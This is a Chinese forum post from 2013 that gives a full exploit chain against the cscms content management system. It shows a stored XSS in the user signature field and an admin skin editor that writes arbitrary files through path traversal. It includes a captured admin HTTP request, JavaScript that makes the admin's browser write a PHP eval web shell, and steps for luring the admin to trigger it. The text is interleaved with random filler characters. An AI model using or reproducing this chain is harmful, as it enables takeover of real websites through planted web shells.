|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
+ h t3 ]5 R6 h% X8 H6 x: \8 x官网已经修补了,所以重新下了源码
+ Z# A+ P: e: s, M; _因为 后台登入 还需要认证码 所以 注入就没看了。8 E/ W+ _" e7 g7 m) `
存在 xss
3 |+ o- v/ }4 W Y' J- z漏洞文件 user/member/skin_edit.php* G. |+ e7 R y" C* G8 [
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:( C V6 a9 D" L2 Z3 ]* ]
' n# J# Z$ v: `1 I' k, l</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?># S( Y& `% b( B- ]2 D9 R+ s% V
5 z0 C2 _) k$ S0 y
</textarea></td></tr>
& D/ Y& F$ G. @
$ S% H1 O: S& z user/do.php
: x: c1 W/ y" Q9 G" Z/ g$ N4 E
8 g1 }7 @2 {3 v7 `( l# I1 W. x
; ~9 D- T1 |8 Y. P- }. v9 Aif($op=='zl'){ //资料
( ?7 S1 |' I. b
; T8 z* X( M: ?0 \ if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
- h4 ] ]& i% f6 }% o exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
/ ^# ?5 T5 c/ P# \
4 ~; Y' i( \) \. j* C $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
# A5 `+ W$ D% Q6 V
$ l" `" a, h9 `- Q CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'. h; ?8 [, d, ]. I
where CS_Name='".$cscms_name."'";
! f& b- u" Q5 }9 ~ 4 L, g6 D1 \4 c. o' |3 A0 }
if($db->query($sql)){0 i- I# C; @6 f) p c' J& [; v
$ Z: {1 K* T5 e: a# Q5 ` exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
# {' h7 r4 ?- P+ p8 ~- A! v2 E / D9 y g+ c4 ]/ Q1 T2 D
}else{! I1 T" n4 o8 _
1 A( }5 ]& t0 T exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));1 `( X( g4 i6 C: s
' w( d* U9 r! ~ }
* x6 _, X8 Z9 X$ f4 t7 W9 F; |- g: d! k! M- f! T) H
& v& ~+ @2 Y! P* r) J/ T
没有 过滤导致xss产生。
2 d4 Y. R* {# Z; z* p I后台 看了下 很奇葩的是可以写任意格式文件。。" K9 j7 J1 t) X
抓包。。
% F; B R6 ^+ f) {4 ]- N, E& D) ~; Z
4 }4 y' s6 v( I- v
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1 f! Q, D, R4 L: z; Q
6 r# w( p* D( E0 J1 E" ]; dAccept: text/html, application/xhtml+xml, */*8 S- p8 c% c7 t8 U, M% r
- s5 O9 {0 b. R5 w' _Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php& y# P/ O7 \% C4 ^, p5 J) c; ^ j
2 J3 }3 K, \+ J- S0 [
Accept-Language: zh-CN
: ]3 x/ R. J' t: N' w$ v. e E ! g; { {' n. [: l1 d0 N
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)1 C) H: \, k2 i; [$ c6 s2 Z
% K# Z5 ~: p/ c& Q" M) D# O& X f4 d F
Content-Type: application/x-www-form-urlencoded
) k, a; n% i! o 1 v9 F8 ^$ e3 s8 D" f6 q
Accept-Encoding: gzip, deflate
% \( g. `5 K7 Y# Y% I: n X9 \5 a, t! K7 e% ~
Host: 127.0.0.1
4 P" [2 p- _* n: G3 c 6 C8 m8 p5 J5 P9 _) c! o
Content-Length: 38
6 J, A. ?# i' x$ Q; J + _) W; C [9 \; S3 ?% b/ D9 e" U
DNT: 1
4 E/ J& z6 e, z6 M' ?5 w8 f
7 h* \( @" X: H8 lConnection: Keep-Alive
6 B6 Z& M& i0 h% v; A
) u, Q2 R! R. W: J$ s6 ECache-Control: no-cache
- k a# ~# S% J8 E% z 8 [% p3 b' E6 }* K) c
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594, ~# O/ H6 @: O& L8 v/ m: @
/ N) O6 f3 o9 k/ v/ k1 ~8 q' T
3 r' @) [& A' M) i0 Aname=aaa.php&content=%3Cs%3E%3Ca%25%3E: m( S) o. C2 ~" q6 B8 U
6 t% l$ E' a, `- T1 ^
+ o5 ?' |5 R* ^; b- g8 F# S. t$ T6 O% g/ H! R3 P& A! k1 H: @
于是 构造js如下。2 N( \ U7 F/ f# h9 _
, k+ @$ s2 {$ x本帖隐藏的内容<script>
( u6 H* g! q) v+ Y GthisTHost = top.location.hostname;. a: ?% Z6 I4 ~( j
& u4 G; L7 G+ T$ i% D7 \: G
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";+ M, F) \! @8 u$ z m
0 ?. J! N6 R7 ^" z: b- hfunction PostSubmit(url, data, msg) {
7 }' L8 V$ i7 u; q4 S5 E var postUrl = url;
# Q( W8 e3 i( |$ h 3 M M; V# [1 _5 v3 }% f
var postData = data;
7 m x4 u8 V6 {! @2 s. R A% t var msgData = msg; T, s4 ?& C* j Y. i7 Q
var ExportForm = document.createElement("FORM"); & {% c! G* k" c. K& y' e4 Z9 @
document.body.appendChild(ExportForm);
3 ~, b) Q, z* e2 d4 @ ExportForm.method = "POST";
/ r$ V7 V" {$ y0 i var newElement = document.createElement("input"); % L D7 n. k& z0 G
newElement.setAttribute("name", "name");
+ |! L( j$ C& d$ N( m newElement.setAttribute("type", "hidden");
9 `+ s9 t! ~6 f# x) l var newElement2 = document.createElement("input"); 0 Z+ g' f) W9 b. n+ C* i, `
newElement2.setAttribute("name", "content");
- }' r h+ {# S7 n( D" k5 ?! C newElement2.setAttribute("type", "hidden"); 5 x" l) p4 X1 ~5 v" ~4 I+ K) a
ExportForm.appendChild(newElement); p! \* ^5 i" }
ExportForm.appendChild(newElement2);
2 c$ D ^# w! r, J newElement.value = postData;
, a" k! ^% ~7 C+ w) T newElement2.value = msgData; % x9 n0 }6 `+ B! o* }8 a y
ExportForm.action = postUrl; , m, X9 R6 s5 s& y8 {1 s% v; f
ExportForm.submit();
" p- ^, u: ]& c, T7 e6 u3 l# ~};' ]6 D) `, r# ?) A/ F( K/ Z
?" {4 h& K9 ~9 I1 E' MPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");7 ?- v/ K1 ]0 ?/ [
% }: n, X4 ?1 ?. e
</script>4 w- B9 h6 x& Q7 `# G
_. [/ q) o+ p2 J5 q7 j& }$ ]& N: k
# Y, y+ s, c/ ]' N8 d+ ~% {
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入8 P( a7 g; G: R
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)* ~* R9 J' c0 m- i8 V8 x
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
- Y& G( q0 a# i+ f/ O0 Y/ I
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对